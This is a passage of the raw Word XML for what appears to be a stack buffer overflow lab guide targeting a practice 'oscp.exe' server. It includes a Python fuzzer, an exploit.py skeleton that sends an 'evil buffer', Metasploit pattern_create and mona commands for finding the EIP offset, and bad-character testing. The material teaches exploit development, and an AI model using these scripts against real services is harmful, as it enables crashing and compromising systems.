        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>string = prefix + "A" * 100</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>while True:</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try:</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with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:</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s.settimeout(timeout)</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s.connect((ip, port))</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s.recv(1024)</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print("Fuzzing with {} bytes".format(len(string) - len(prefix)))</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s.send(bytes(string, "latin-1"))</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s.recv(1024)</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except:</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print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))</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sys.exit(0)</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string += 100 * "A"</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time.sleep(1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Run the fuzzer.py script using python: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="00FF00"/>
          <w:shd w:fill="000000" w:val="clear"/>
        </w:rPr>
        <w:t>python3 fuzzer.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The fuzzer will send increasingly long strings comprised of As. If the fuzzer crashes the server with one of the strings, the fuzzer should exit with an error message. Make a note of the largest number of bytes that were sent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Crash Replication &amp; Controlling EIP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>﻿</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Create another file on your Kali box called exploit.py with the following contents:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>import socket</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>ip = "MACHINE_IP"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>port = 1337</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>prefix = "OVERFLOW1 "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>offset = 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>overflow = "A" * offset</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>retn = ""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>padding = ""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>payload = ""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>postfix = ""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>buffer = prefix + overflow + retn + padding + payload + postfix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>try:</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s.connect((ip, port))</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print("Sending evil buffer...")</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s.send(bytes(buffer + "\r\n", "latin-1"))</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print("Done!")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>except:</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1"/>
        </w:rPr>
        <w:t>print("Could not connect.")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Run the following command to generate a cyclic pattern of a length 400 bytes longer that the string that crashed the server (change the -l value to this):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="00FF00"/>
          <w:shd w:fill="000000" w:val="clear"/>
        </w:rPr>
        <w:t>/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Copy the output and place it into the payload variable of the exploit.py script.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>On Windows, in Immunity Debugger, re-open the oscp.exe again using the same method as before, and click the red play icon to get it running. You will have to do this prior to each time we run the exploit.py (which we will run multiple times with incremental modifications).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">On Kali, run the modified exploit.py script: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="00FF00"/>
          <w:shd w:fill="000000" w:val="clear"/>
        </w:rPr>
        <w:t>python3 exploit.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The script should crash the oscp.exe server again. This time, in Immunity Debugger, in the command input box at the bottom of the screen, run the following mona command, changing the distance to the same length as the pattern you created:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="00FF00"/>
          <w:shd w:fill="000000" w:val="clear"/>
        </w:rPr>
        <w:t>!mona findmsp -distance 600</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Mona should display a log window with the output of the command. If not, click the "Window" menu and then "Log data" to view it (choose "CPU" to switch back to the standard view).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In this output you should see a line which states:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>EIP contains normal pattern : ... (offset XXXX)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Update your exploit.py script and set the offset variable to this value (was previously set to 0). Set the payload variable to an empty string again. Set the retn variable to "BBBB".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Restart oscp.exe in Immunity and run the modified exploit.py script again. The EIP register should now be overwritten with the 4 B's (e.g. 42424242).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Finding Bad Characters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>﻿</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Generate a bytearray using mona, and exclude the null byte (\x00) by default. Note the location of the bytearray.bin file that is generated (if the working folder was set per the Mona Configuration section of this guide, then the location should be C:\mona\oscp\bytearray.bin).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="00FF00"/>
          <w:shd w:fill="000000" w:val="clear"/>
        </w:rPr>
        <w:t>!mona bytearray -b "\x00"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Now generate a string of bad chars that is identical to the bytearray. The following python script can be used to generate a string of bad chars from \x01 to \xff:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>for x in range(1, 256):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>print("\\x" + "{:02x}".format(x), end='')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>print()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Update your exploit.py script and set the payload variable to the string of bad chars the script generates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Restart oscp.exe in Immunity and run the modified exploit.py script again. Make a note of the address to which the ESP register points and use it in the following mona command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="00FF00"/>
          <w:shd w:fill="000000" w:val="clear"/>
        </w:rPr>
        <w:t>!mona compare -f C:\mona\oscp\bytearray.bin -a &lt;address&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A popup window should appear labelled "mona Memory comparison results". If not, use the Window menu to switch to it. The window shows the results of the comparison, indicating any characters that are different in memory to what they are in the generated bytearray.bin file.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
